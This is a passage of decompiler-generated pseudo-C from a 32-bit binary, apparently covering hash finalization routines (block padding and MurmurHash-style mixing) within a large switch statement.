										goto L346;
									}
								} else {
									if(( *__esp & 0x00000001) != 0) {
										L346:
										__edx =  *(__eax + __edx) & 0x000000ff;
										 *(__eax + __ebp) = __dl;
									}
								}
								 *__esp = __ecx;
								__ebp = __edi + 0x90;
								__edx = __edi + 0x10;
								__ebp = L1003EA30(__ebp, __edi + 0x10);
								__ecx =  *__esp;
								__esp[0xb] = __esp[0xb] + __esi;
								__eax = __esp[0xb];
								__ebx =  *__esp + __ebx - 0x80;
								__edx = __ebx;
								__ebx = __ebx & 0x0000007f;
								__edx = __edx & 0xffffff80;
								__eax = __esp[0xb] + __edx;
								if(__esp[0xb] >= __eax) {
									__eax = 0x10;
								} else {
									__esp[0xc] = __ebx;
									__esi = __esp[0xb];
									 *__esp = __edx;
									__ebx = __esp[0xb];
									__esi = __eax;
									do {
										__edx = __ebx;
										__ebp = L1003EA30(__ebp, __ebx);
										__ebx = __ebx - 0xffffff80;
									} while (__ebx < __esi);
									__edx =  *__esp;
									__eax = 0x10;
									__ebx = __esp[0xc];
									__esp[0xb] = __esp[0xb] +  *__esp;
								}
							}
							__ecx = __edi + __eax;
							__eax = __esp[0xb];
							if(__ebx >= 4) {
								if((__cl & 0x00000001) != 0) {
									__edx =  *__eax & 0x000000ff;
									__ecx = __ecx + 1;
									__eax = __eax + 1;
									__ebx = __ebx - 1;
									 *(__ecx - 1) = __dl;
								}
								if((__cl & 0x00000002) != 0) {
									__esi =  *__eax & 0x0000ffff;
									__ecx = __ecx + 2;
									__eax = __eax + 2;
									__ebx = __ebx - 2;
									 *(__ecx - 2) = __si;
								}
								if(__ebx >= 4) {
									__edi = __ebx;
									__edx = 0;
									__edi = __ebx & 0xfffffffc;
									do {
										__esi =  *(__eax + __edx);
										 *(__ecx + __edx) =  *(__eax + __edx);
										__edx = __edx + 4;
									} while (__edx < __edi);
									__ecx = __ecx + __edx;
									__eax = __eax + __edx;
								}
							}
							__edx = 0;
							if((__bl & 0x00000002) != 0) {
								__edi =  *__eax & 0x0000ffff;
								__edx = 2;
								 *__ecx = __di;
								if((__bl & 0x00000001) == 0) {
									goto L329;
								} else {
									goto L330;
								}
							} else {
								if((__bl & 0x00000001) != 0) {
									L330:
									__eax =  *(__eax + __edx) & 0x000000ff;
									 *(__ecx + __edx) = __al;
									__esp =  &(__esp[5]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								} else {
									L329:
									__esp =  &(__esp[5]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								}
							}
							goto L440;
						case 0x14:
							__esp[3] = __ecx;
							__esp[2] = __edx;
							__eax =  *(__ebx + 0xc);
							__esp[1] =  *(__ebx + 0xc);
							__eax =  *(8 + __ebx);
							 *__esp =  *(8 + __ebx);
							__eax = E100101D0();
							 *(__ebx + 0xc) = __eax;
							__ebx = __esp[6];
							__esp =  &(__esp[7]);
							return __eax;
							goto L440;
						case 0x15:
							__esp[2] = __ecx;
							__esp[1] = __edx;
							__eax =  *(__ebx + 0xc);
							 *__esp =  *(__ebx + 0xc);
							__eax = E10001410();
							 *(__ebx + 0xc) = __eax;
							__ebx = __esp[6];
							__esp =  &(__esp[7]);
							return __eax;
							goto L440;
						case 0x16:
							__esp[2] = __ecx;
							__esp[1] = __eax;
							_push(__ebp);
							_push(__edi);
							__edi = 0x100b3b44;
							_push(__esi);
							__esi = 1;
							_push(__ebx);
							__esp = __esp - 0x2c;
							__ebx = __esp[0x10];
							__eax =  *__ebx;
							__edx =  *(__ebx + 4);
							__esp[2] = 1;
							__esp[1] = 0x100b3b44;
							 *__esp = __ebx;
							__edx = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
							__esp[9] = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
							__esp[8] = __eax;
							L81();
							__esi =  *__ebx;
							__edi =  *(__ebx + 4);
							__esi = __esi & 0x0000003f;
							if((__esi & 0x0000003f ^ 0x00000038) != 0) {
								__ebp = __ebx + 0x48;
								__esp[5] = __ebx + 0x48;
								__ecx = 8 + __ebx;
								__ebp = 8 + __ebx;
								while(1) {
									L117:
									__eax = __esi;
									__eax = __esi & 0x0000003f;
									__esi = __esi + 1;
									 *__ebx = __esi;
									asm("adc edi, 0x0");
									 *(__ebx + 4) = __edi;
									if(__eax != 0) {
										break;
									}
									__eax = __esp[5];
									__ecx = 0;
									__edx = 0x100b3b46;
									E10025550(__esp[5], 0, 0x100b3b46) = __esi;
									 *(8 + __ebx) = 0;
									__esi & 0x0000003f = __esi & 0x0000003f ^ 0x00000038;
									__eax = __esi & 0x0000003f ^ 0x00000038;
									if((__esi & 0x0000003f ^ 0x00000038) != 0) {
										continue;
									}
									goto L121;
								}
								 *(__eax + __ebp) = 0;
								if(__eax == 0x3f) {
									__edi = __esp[5];
									__ecx = 1;
									__edx = __ebp;
									__edi = E10025550(__edi, 1, __ebp);
									__ecx = 0;
									__edx = 0x100b3b47;
									__edi = E10025550(__edi, 0, 0x100b3b47);
								}
								__esi =  *__ebx;
								__edi =  *(__ebx + 4);
								__esi = __esi & 0x0000003f;
								if((__esi & 0x0000003f ^ 0x00000038) != 0) {
									goto L117;
								}
							}
							L121:
							 *__esp = __ebx;
							__eax = 8;
							__esp[2] = 8;
							__eax =  &(__esp[8]);
							__esp[1] =  &(__esp[8]);
							L81();
							__eax =  *(__ebx + 0x54);
							__edi = __esp[0x11];
							 *__edi =  *(__ebx + 0x54);
							__eax =  *(__ebx + 0x50);
							 *(__edi + 4) =  *(__ebx + 0x50);
							__eax =  *(__ebx + 0x4c);
							 *(__edi + 8) =  *(__ebx + 0x4c);
							__eax =  *(__ebx + 0x48);
							 *(__edi + 0xc) = __eax;
							__esp =  &(__esp[0xb]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							return __eax;
							goto L440;
						case 0x17:
							__esp[2] = __ecx;
							__esp[1] = __eax;
							_push(__ebp);
							_push(__edi);
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x1c;
							__eax = __esp[0xc];
							__edi = __esp[0xc];
							__edx =  *(__eax + 4);
							__eax =  *__eax;
							__esp[3] = __edx;
							__esp[2] = __eax;
							__eax = __esp[0xc];
							__edx =  *(__eax + 0xc);
							__eax =  *(__eax + 8);
							__esp[5] = __edx;
							__edx = 0x10;
							__esp[4] = __eax;
							__eax = __esp[0xc];
							__eax =  *(__esp[0xc] + 0x20);
							__edi = __esp[0xc] + __eax + 0x10;
							__edx = 0x10 - __eax;
							if(0x10 >= 8) {
								if((__edi & 0x00000001) != 0) {
									 *__edi = 0;
									__edx = __edx - 1;
									__edi = __edi + 1;
								}
								if((__edi & 0x00000002) != 0) {
									 *__edi = 0;
									__edx = __edx - 2;
									__edi = __edi + 2;
								}
								if((__edi & 0x00000004) != 0) {
									 *__edi = 0;
									__edx = __edx - 4;
									__edi = __edi + 4;
								}
								__ecx = __edx;
								__eax = 0;
								__ecx = __edx >> 2;
								__edx = __edx & 0x00000003;
								__eax = memset(__edi, 0, __ecx << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
							}
							if((__dl & 0x00000004) != 0) {
								 *__edi = 0;
								__edi = __edi + 4;
							}
							if((__dl & 0x00000002) != 0) {
								 *__edi = 0;
								__edi = __edi + 2;
							}
							if((__dl & 0x00000001) != 0) {
								 *__edi = 0;
							}
							__eax = __esp[0xc];
							__ebx = __esp[0xc];
							__edi = __esp[3];
							__eax =  *(0x10 + __esp[0xc]);
							__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5;
							__ebx = 0x114253d5;
							__edx = __eax * 0x87c37b91;
							__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
							__edx = __eax * 0x114253d5 >> 0x20;
							__eax = __eax * 0x114253d5;
							__edx = __edx + __ecx;
							__ecx = __eax;
							__eax = (__eax << 0x00000020 | __edx) << 0x1f;
							__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
							__ebx = __eax;
							__eax = __esp[0xc];
							__esi = __edx;
							__ecx = __esp[2];
							__edx =  *(__eax + 0x2c);
							__eax =  *(__eax + 0x28);
							__esp[1] = __edx;
							__edx = __edx ^ __esp[3];
							 *__esp = __eax;
							__ebp = __edx;
							__eax = __eax ^ __esp[2];
							__edx = __ebx * 0x4cf5ad43;
							__edi = __eax;
							__ecx = __esi * 0x2745937f;
							__esi = 0x114253d5;
							__eax = __ecx + __ebx * 0x4cf5ad43;
							__ecx = 0x2745937f;
							__esp[2] = __eax;
							__eax = __ebx;
							__edx = __eax * 0x2745937f >> 0x20;
							__eax = __eax * 0x2745937f;
							__ebx = __esp[2];
							__eax = __eax ^ __edi;
							__edx = __esp[2] + __edx;
							__ebx = __esp[0xc];
							__esp[2] = __eax;
							__eax = __esp[0xc];
							__esp[3] = __edx;
							__edi =  *__esp;
							__ebp = __esp[1];
							__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f;
							__eax =  *(__esp[0xc] + 0x18);
							__ebx = __esp[5];
							__edx = __eax * 0x4cf5ad43;
							__ebp = __esp[1] ^ __esp[5];
							__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
							__edx = 0x2745937f;
							__edx = __eax * 0x2745937f >> 0x20;
							__eax = __eax * 0x2745937f;
							__edx = __edx + __ecx;
							__ecx = __eax;
							 *__esp = __eax;
							__edx = (__ecx << 0x00000020 | __edx) >> 0x1f;
							__ecx = __esp[4];
							__eax =  *__esp;
							__edi =  *__esp ^ __esp[4];
							__ecx =  *__esp ^ __esp[4];
							__edi = __edx * 0x114253d5;
							__edx =  *__esp * 0x87c37b91;
							__edi = __edi +  *__esp * 0x87c37b91;
							__edx = __eax * 0x114253d5 >> 0x20;
							__eax = __eax * 0x114253d5;
							__esi = __esp[2];
							__edx = __edi + __edx;
							__edi = __esp[3];
							__eax = __eax ^  *__esp ^ __esp[4];
							__edx = __edx ^ __esp[1] ^ __esp[5];
							__esi = __esp[2] + __eax;
							__ebp = 0x1a85ec53;
							asm("adc edi, edx");
							__eax = __eax + __esi;
							asm("adc edx, edi");
							__ecx = __eax;
							__eax = __edi;
							__ebx = __edx;
							__eax = __edi >> 1;
							__edx = 0;
							__eax = __edi >> 0x00000001 ^ __esi;
							__edx = 0 ^ __edi;
							__esi = (0 ^ __edi) * 0xed558ccd;
							__edi = __eax;
							__edx = __eax * 0xff51afd7;
							__eax = 0xed558ccd;
							__esi = __esi + __edx;
							__edx = 0xed558ccd * __edi >> 0x20;
							__eax = 0xed558ccd * __edi;
							__edi = 0;
							__edx = __esi + __edx;
							__esi = __edx;
							__edx = __edx ^ 0;
							 *__esp = __eax;
							__esi = __edx * 0x1a85ec53;
							__eax =  *__esp;
							__edx =  *__esp * 0xc4ceb9fe;
							__edi = __esi + __edx;
							__esp[2] = __esi + __edx;
							__edx = __eax * 0x1a85ec53 >> 0x20;
							__eax = __eax * 0x1a85ec53;
							__edi = __edx;
							__edx = __esp[2];
							__esi = __eax;
							__edi = __edi + __esp[2];
							__edx = __edi;
							__eax = __edi;
							__edx = 0;
							__esp[3] = 0;
							__eax = __edi >> 1;
							__edx = __ebx;
							__esp[2] = __edi >> 1;
							__eax = __ebx;
							__edx = 0;
							__eax = __ebx >> 1;
							__edx = 0 ^ __ebx;
							__ebx = (0 ^ __ebx) * 0xed558ccd;
							 *__esp = __eax;
							__ecx = 0xed558ccd;
							__edx =  *__esp * 0xff51afd7;
							__eax =  *__esp;
							__ebx = __ebx +  *__esp * 0xff51afd7;
							__edx = __eax * 0xed558ccd >> 0x20;
							__eax = __eax * 0xed558ccd;
							__edx = __edx + __ebx;
							__ebx = __edx;
							__ecx = __edx;
							__ebx = 0;
							__edx >> 1 = __edx >> 0x00000001 ^ __eax;
							__ebx = 0 ^ __edx;
							 *__esp = __edx >> 0x00000001 ^ __eax;
							__edx = __ebx;
							__eax =  *__esp * 0xc4ceb9fe;
							__esp[1] = __ebx;
							__ebx = __ebx * 0x1a85ec53;
							__ebx = __ebx +  *__esp * 0xc4ceb9fe;
							__eax =  *__esp;
							__edx = __eax * 0x1a85ec53 >> 0x20;
							__eax = __eax * 0x1a85ec53;
							__edx = __edx + __ebx;
							__ebx = 0;
							__ecx = __edx;
							__edx = __edx ^ 0;
							__ebx = __esp[3];
							__eax = __eax ^ __ecx;
							__ecx = __esp[2];
							__ebx = __edi;
							__edi = __esp[0xd];
							__esi = __esi ^ __esp[2];
							__ecx = __esi;
							__ecx = __esi + __eax;
							 *__edi = __ecx;
							asm("adc ebx, edx");
							__ecx = __eax + __ecx;
							 *(__edi + 4) = __ebx;
							asm("adc ebx, edx");
							 *(__edi + 8) = __ecx;
							 *(__edi + 0xc) = __ebx;
							__esp =  &(__esp[7]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							return __eax;
							goto L440;
						case 0x18:
							__esp[2] = __ecx;
							__esp[1] = __eax;
							_push(__edi);
							__edi = 1;
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x20;
							__esi = __esp[0xc];
							__ebx = __esp[0xd];
							__eax =  *(__esi + 8);
							__edx =  *(__esi + 0xc);
							__esp[2] = 1;
							__edi = __esi + 0x10;
							 *__esp = __esi;
							__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
							__esp[7] = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
							__esp[6] = __eax;
							__eax = 0x100bc2e0;
							__esp[1] = 0x100bc2e0;
							L220();
							__eax =  *(__esi + 8);
							__edx =  *(__esi + 0xc);
							__eax = __eax & 0x0000003f;
							if((__eax & 0x0000003f ^ 0x00000038) != 0) {
								do {
									__ecx = __eax;
									__ecx = __eax & 0x0000003f;
									 *(__esi + 8) = __eax;
									asm("adc edx, 0x0");
									 *(__esi + 0xc) = __edx;
									if(__ecx != 0x3f) {
										 *((char*)(__esi + 0x10 + __ecx)) = 0;
									} else {
										 *((char*)(__esi + 0x4f)) = 0;
										__eax = __esi + 0x50;
										__esp[1] = __edi;
										 *__esp = __esi + 0x50;
										__eax =  *((intOrPtr*)(__esi + 0x78))();
									}
									__eax =  *(__esi + 8);
									__edx =  *(__esi + 0xc);
									__eax = __eax & 0x0000003f;
								} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
							} else {
							}
							 *__esp = __esi;
							__eax = 8;
							__esp[2] = 8;
							__eax =  &(__esp[6]);
							__esp[1] = __eax;
							L220();
							if( *__esi != 0) {
								__eax =  *(__esi + 0x50);
								 *__ebx = __eax;
								if( *__esi > 1) {
									__eax =  *(__esi + 0x54);
									 *(__ebx + 4) = __eax;
									if( *__esi > 2) {
										__eax =  *(__esi + 0x58);
										 *(8 + __ebx) = __eax;
										if( *__esi > 3) {
											__eax =  *(__esi + 0x5c);
											 *(__ebx + 0xc) = __eax;
											if( *__esi > 4) {
												__eax =  *(__esi + 0x60);
												 *(0x10 + __ebx) = __eax;
												if( *__esi > 5) {
													__eax =  *(__esi + 0x64);
													 *(__ebx + 0x14) = __eax;
													if( *__esi > 6) {
														__eax =  *(__esi + 0x68);
														 *(__ebx + 0x18) = __eax;
														if( *__esi > 7) {
															__eax =  *(__esi + 0x6c);
															 *(__ebx + 0x1c) = __eax;
															if( *__esi > 8) {
																__eax =  *(__esi + 0x70);
																 *(__ebx + 0x20) = __eax;
																if( *__esi > 9) {
																	__eax =  *(__esi + 0x74);
																	 *(__ebx + 0x24) = __eax;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							__esp =  &(__esp[8]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							return __eax;
							goto L440;
						case 0x19:
							__esp[2] = __ecx;
							__esp[1] = __eax;
							_push(__ebp);
							_push(__edi);
							__edi = 1;
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x2c;
							__esi = __esp[0x10];
							__ebx = __esp[0x11];
							__eax =  *(__esi + 8);
							__edx =  *(__esi + 0xc);
							__esp[2] = 1;
							__edi = __esi + 0x10;
							 *__esp = __esi;
							__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
							__eax = __eax << 3;
							__ebp = __edx;
							__edx = __eax;
							__eax = __ebp;
							__ebp = 0x100bc420;
							asm("bswap edx");
							asm("bswap eax");
							__esp[1] = 0x100bc420;
							__esp[6] = __eax;
							__esp[7] = __edx;
							L273();
							__eax =  *(__esi + 8);
							__edx =  *(__esi + 0xc);
							__eax = __eax & 0x0000003f;
							if((__eax & 0x0000003f ^ 0x00000038) != 0) {
								do {
									__ecx = __eax;
									__ecx = __eax & 0x0000003f;
									 *(__esi + 8) = __eax;
									asm("adc edx, 0x0");
									 *(__esi + 0xc) = __edx;
									if(__ecx != 0x3f) {
										 *((char*)(__esi + 0x10 + __ecx)) = 0;
									} else {
										 *((char*)(__esi + 0x4f)) = 0;
										__eax = __esi + 0x50;
										__esp[1] = __edi;
										 *__esp = __esi + 0x50;
										__eax =  *(__esi + 0x70)();
									}
									__eax =  *(__esi + 8);
									__edx =  *(__esi + 0xc);
									__eax = __eax & 0x0000003f;
								} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
							} else {
							}
							 *__esp = __esi;
							__eax = 8;
							__esp[2] = 8;
							__eax =  &(__esp[6]);
							__esp[1] = __eax;
							L273();
							if( *__esi != 0) {
								__eax =  *(__esi + 0x50);
								asm("bswap eax");
								 *__ebx = __eax;
								if( *__esi > 1) {
									__eax =  *(__esi + 0x54);
									asm("bswap eax");
									 *(__ebx + 4) = __eax;
									if( *__esi > 2) {
										__eax =  *(__esi + 0x58);
										asm("bswap eax");
										 *(8 + __ebx) = __eax;
										if( *__esi > 3) {
											__eax =  *(__esi + 0x5c);
											asm("bswap eax");
											 *(__ebx + 0xc) = __eax;
											if( *__esi > 4) {
												__eax =  *(__esi + 0x60);
												asm("bswap eax");
												 *(0x10 + __ebx) = __eax;
												if( *__esi > 5) {
													__eax =  *(__esi + 0x64);
													asm("bswap eax");
													 *(__ebx + 0x14) = __eax;
													if( *__esi > 6) {
														__eax =  *(__esi + 0x68);
														asm("bswap eax");
														 *(__ebx + 0x18) = __eax;
														if( *__esi > 7) {
															__eax =  *(__esi + 0x6c);
															asm("bswap eax");
															 *(__ebx + 0x1c) = __eax;
															if( *__esi > 8) {
																__eax =  *(__esi + 0x70);
																asm("bswap eax");
																 *(__ebx + 0x20) = __eax;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							__esp =  &(__esp[0xb]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							return __eax;
							goto L440;
						case 0x1a:
							__esp[2] = __ecx;
							__esp[1] = __eax;
							_push(__ebp);
							__eax = 0;
							_push(__edi);
							__edx = 0;
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x1c;
							__esp[2] = 0;
							__ebx = __esp[0xc];
							__esp[3] = 0;
							__eax =  *(8 + __ebx);
							__edx =  *(__ebx + 0xc);
							__eax = __eax << 3;
							__edi = __edx;
							__edi = (__edx << 0x00000020 | __eax) << 3;
							__ecx = __eax << 3;
							asm("bswap ecx");
							__esp[5] = __eax << 3;
							__ecx = __eax;
							__ecx = __eax & 0x0000007f;
							 *(8 + __ebx) = __eax;
							asm("adc edx, 0x0");
							__esi = __edi;
							asm("bswap esi");
							 *(__ebx + 0xc) = __edx;
							__esp[4] = __edi;
							if(__ecx == 0x7f) {
								 *((char*)(__ebx + 0x8f)) = 0x80;
								__edx = 0x10 + __ebx;
								__esi = 0x100bc429;
								__ebx + 0x90 = L1003EA30(__ebx + 0x90, 0x10 + __ebx);
								__edx = 0x10;
								__ecx = 0;
							} else {
								__edx = 0x10 + __ecx;
								__esi = 0x100bc428;
								__ecx = 1;
							}
							__edx = __edx + __ebx;
							if(__ecx != 0) {
								__eax = 0;
								__edi = __ebx;
								do {
									__ebx =  *(__esi + __eax) & 0x000000ff;
									 *(__eax + __edx) = __bl;
									__eax = __eax + 1;
								} while (__eax < __ecx);
								__ebx = __edi;
							}
							__esi =  *(8 + __ebx);
							__edi =  *(__ebx + 0xc);
							__esi = __esi & 0x0000007f;
							if((__esi & 0x0000007f ^ 0x00000070) != 0) {
								__ebp = 0x10 + __ebx;
								while(1) {
									L369:
									__eax = __esi;
									__eax = __esi & 0x0000007f;
									__esi = __esi + 1;
									 *(8 + __ebx) = __esi;
									asm("adc edi, 0x0");
									 *(__ebx + 0xc) = __edi;
									if(__eax == 0x7f) {
										break;
									}
									 *((char*)(__ebx + __eax + 0x10)) = 0;
									__esi =  *(8 + __ebx);
									__edi =  *(__ebx + 0xc);
									__esi = __esi & 0x0000007f;
									if((__esi & 0x0000007f ^ 0x00000070) != 0) {
										continue;
									}
									goto L371;
								}
								 *((char*)(__ebx + 0x8f)) = 0;
								__eax = __ebx + 0x90;
								__edx = __ebp;
								L1003EA30(__ebx + 0x90, __ebp) = __esi;
								__esi & 0x0000007f = __esi & 0x0000007f ^ 0x00000070;
								__eax = __esi & 0x0000007f ^ 0x00000070;
								if((__esi & 0x0000007f ^ 0x00000070) != 0) {
									goto L369;
								}
							}
							L371:
							__ebp = __esi;
							__ebp = __esi & 0x0000007f;
							 *(8 + __ebx) = __esi;
							__esi = 0x80;
							asm("adc edi, 0x0");
							 *(__ebx + 0xc) = __edi;
							__edx = 0x10 + __ebp;
							__esi = 0x80 - __ebp;
							if(0x80 <= 8) {
								__edx = __edx + __ebx;
								__ecx =  &(__esp[2]);
								__edi = 0x80;
								if(0x80 >= 4) {
									if((__dl & 0x00000001) != 0) {
										__eax = __esp[2] & 0x000000ff;
										__ecx =  &(__esp[2]);
										__edx = __edx + 1;
										__edi = 0x7f;
										 *(__edx - 1) = __al;
									}
									if((__dl & 0x00000002) != 0) {
										__eax =  *__ecx & 0x0000ffff;
										__edx = __edx + 2;
										__ecx = __ecx + 2;
										__edi = __edi - 2;
										 *(__edx - 2) = __ax;
									}
									if(__edi >= 4) {
										__esp[1] = __ebp;
										__eax = __edi;
										__esp[0xc] = __ebx;
										__eax = __edi & 0xfffffffc;
										 *__esp = __edi & 0xfffffffc;
										__eax = 0;
										__ebp =  *__esp;
										do {
											__ebx =  *(__eax + __ecx);
											 *(__eax + __edx) =  *(__eax + __ecx);
											__eax = __eax + 4;
										} while (__eax < __ebp);
										__ebp = __esp[1];
										__edx = __eax + __edx;
										__ecx = __eax + __ecx;
										__ebx = __esp[0xc];
									}
								}
								__eax = 0;
								if((__edi & 0x00000002) != 0) {
									__eax =  *__ecx & 0x0000ffff;
									__edi = __edi & 0x00000001;
									 *__edx = __ax;
									__eax = 2;
									if(__edi != 0) {
										goto L414;
									}
								} else {
									if(__edi != 0) {
										L414:
										__ecx =  *(__eax + __ecx) & 0x000000ff;
										 *(__eax + __edx) = __cl;
									}
								}
								__edx = 0x10 + __ebx;
								__ebp = __ebp - 0x78;
								__ebx + 0x90 = L1003EA30(__ebx + 0x90, 0x10 + __ebx);
								__eax = __esi + 8;
								__edx = 0x10;
								__eax = __esi + 8 + __esp;
							} else {
								__eax =  &(__esp[2]);
								__ebp = 8;
							}
							__ecx = __ebx + __edx;
							if(__ebp >= 4) {
								if((__cl & 0x00000001) != 0) {
									__edx =  *__eax & 0x000000ff;
									__ecx = __ecx + 1;
									__eax = __eax + 1;
									__ebp = __ebp - 1;
									 *(__ecx - 1) = __dl;
								}
								if((__cl & 0x00000002) != 0) {
									__edx =  *__eax & 0x0000ffff;
									__ecx = __ecx + 2;
									__eax = __eax + 2;
									__ebp = __ebp - 2;
									 *(__ecx - 2) = __dx;
								}
								if(__ebp >= 4) {
									__esi = __ebp;
									__edx = 0;
									__esi = __ebp & 0xfffffffc;
									do {
										__edi =  *(__eax + __edx);
										 *(__ecx + __edx) =  *(__eax + __edx);
										__edx = __edx + 4;
									} while (__edx < __esi);
									__ecx = __ecx + __edx;
									__eax = __eax + __edx;
								}
							}
							__edx = 0;
							if((__ebp & 0x00000002) != 0) {
								__edx =  *__eax & 0x0000ffff;
								__ebp = __ebp & 0x00000001;
								 *__ecx = __dx;
								__edx = 2;
								if(__ebp == 0) {
									goto L376;
								} else {
									goto L390;
								}
								L386:
								__esp =  &(__esp[7]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __eax;
								goto L440;
							} else {
								if(__ebp != 0) {
									L390:
									__eax =  *(__eax + __edx) & 0x000000ff;
									 *(__ecx + __edx) = __al;
								}
							}
							L376:
							__eax =  *(8 + __ebx);
							__edi = 0x80;
							__edx =  *(__ebx + 0xc);
							__esi = __eax;
							__esi = __eax & 0x0000007f;
							 *(8 + __ebx) = __eax;
							asm("adc edx, 0x0");
							__edi = 0x80 - __esi;
							if(0x80 <= 8) {
								__ebp = 0x80;
								__edx = __esi + 0x10 + __ebx;
								__ecx =  &(__esp[4]);
								if(0x80 >= 4) {
									if((__dl & 0x00000001) != 0) {
										__eax = __esp[4] & 0x000000ff;
										__ecx =  &(__esp[4]);
										__edx = __edx + 1;
										__ebp = 0x7f;
										 *(__edx - 1) = __al;
									}
									if((__dl & 0x00000002) != 0) {
										__eax =  *__ecx & 0x0000ffff;
										__edx = __edx + 2;
										__ecx = __ecx + 2;
										__ebp = __ebp - 2;
										 *(__edx - 2) = __ax;
									}
									if(__ebp >= 4) {
										__esp[1] = __esi;
										__eax = __ebp;
										__esp[0xc] = __ebx;
										__eax = __ebp & 0xfffffffc;
										 *__esp = __ebp & 0xfffffffc;
										__eax = 0;
										__esi =  *__esp;
										do {
											__ebx =  *(__eax + __ecx);
											 *(__eax + __edx) =  *(__eax + __ecx);
											__eax = __eax + 4;
										} while (__eax < __esi);
										__esi = __esp[1];
										__edx = __eax + __edx;
										__ecx = __eax + __ecx;
										__ebx = __esp[0xc];
									}
								}
								__eax = 0;
								if((__ebp & 0x00000002) != 0) {
									__eax =  *__ecx & 0x0000ffff;
									__ebp = __ebp & 0x00000001;
									 *__edx = __ax;
									__eax = 2;
									if(__ebp != 0) {
										goto L417;
									}
								} else {
									if(__ebp != 0) {
										L417:
										__ecx =  *(__eax + __ecx) & 0x000000ff;
										 *(__eax + __edx) = __cl;
									}
								}
								__edx = 0x10 + __ebx;
								__ebx + 0x90 = L1003EA30(__ebx + 0x90, 0x10 + __ebx);
								__eax =  &(__esp[4]);
								__edx =  &(__esp[4]) + __edi;
								__eax = __esi - 0x78;
								__esi = 0x10;
							} else {
								__esi = __esi + 0x10;
								__eax = 8;
								__edx =  &(__esp[4]);
							}
							__esi = __esi + __ebx;
							if(__eax >= 4) {
								if((__esi & 0x00000001) != 0) {
									__ecx =  *__edx & 0x000000ff;
									__esi = __esi + 1;
									__edx = __edx + 1;
									__eax = __eax - 1;
									 *(__esi - 1) = __cl;
								}
								if((__esi & 0x00000002) != 0) {
									__edi =  *__edx & 0x0000ffff;
									__esi = __esi + 2;
									__edx = __edx + 2;
									__eax = __eax - 2;
									 *(__esi - 2) = __di;
								}
								if(__eax >= 4) {
									__edi = __eax;
									__ecx = 0;
									__edi = __eax & 0xfffffffc;
									do {
										__ebp =  *(__edx + __ecx);
										 *(__esi + __ecx) =  *(__edx + __ecx);
										__ecx = __ecx + 4;
									} while (__ecx < __edi);
									__esi = __esi + __ecx;
									__edx = __edx + __ecx;
								}
							}
							__ecx = 0;
							if((__al & 0x00000002) != 0) {
								__edi =  *__edx & 0x0000ffff;
								__ecx = 2;
								 *__esi = __di;
								if((__al & 0x00000001) == 0) {
									goto L381;
								} else {
									goto L387;
								}
								goto L440;
							} else {
								if((__al & 0x00000001) != 0) {
									L387:
									__eax =  *(__edx + __ecx) & 0x000000ff;
									 *(__esi + __ecx) = __al;
								}
							}
							L381:
							__edi = 0;
							__ebp = 0;
							if( *__ebx != 0) {
								__edx = 0;
								__ebp = __esp[0xd];
								__eax = 0;
								do {
									__esi =  *(__ebx + 0x90 + __eax * 8);
									__edi =  *(__ebx + 0x94 + __eax * 8);
									asm("bswap esi");
									 *(__ebp + 4 + __eax * 8) =  *(__ebx + 0x90 + __eax * 8);
									asm("bswap edi");
									 *(__ebp + __eax * 8) =  *(__ebx + 0x94 + __eax * 8);
									__eax = __eax + 1;
									__ecx =  *__ebx & 0x000000ff;
									asm("adc edx, 0x0");
									__edi = 0;
									 *__esp = __cl;
									__ecx = 0;
									asm("sbb ecx, edi");
								} while (__eax < ( *__ebx & 0x000000ff));
								__esp[2] = __eax;
								__ecx =  *__esp & 0x000000ff;
								__esp[3] = 0;
								if(__cl != 0) {
									__edx = __eax + 0x12;
									__edi = __esp[0xd];
									__ecx =  *(__ebx + 4 + (__eax + 0x12) * 8);
									__edx = __ecx;
									__ebx = __ch & 0x000000ff;
									__edx = __ecx << 8;
									__edx = __ecx << 0x00000008 | __ch & 0x000000ff;
									__ebx = __ecx;
									__ebx = __ecx >> 8;
									__ecx = __ecx >> 0x18;
									__ebx = __ebx & 0x0000ff00;
									__edx = __edx << 0x10;
									 *(__esp[0xd] + __eax * 8) = __edx;
								}
							}
							goto L386;
						case 0x1b:
							__eax =  *(__eax + 0xc);
							__eax =  !__eax;
							asm("bswap eax");
							 *__ecx = __eax;
							return __eax;
							goto L440;
						case 0x1c:
							__eax =  *(__eax + 0xc);
							asm("bswap eax");
							 *__ecx = __eax;
							return __eax;
							goto L440;
						case 0x1d:
							__esi =  &(__esp[4]);
							__esp[1] = __esi;
							__eax =  *__edx;
							 *__esp =  *__edx;
							L114();
							goto L33;
						case 0x1e:
							__esi =  &(__esp[4]);
							__esp[1] = __esi;
							__eax =  *__edx;
							 *__esp =  *__edx;
							L205();
							goto L33;
						case 0x1f:
							__esi =  &(__esp[4]);
							__esp[1] = __esi;
							__eax =  *__edx;
							 *__esp =  *__edx;
							L255();
							__ecx = __ebp;
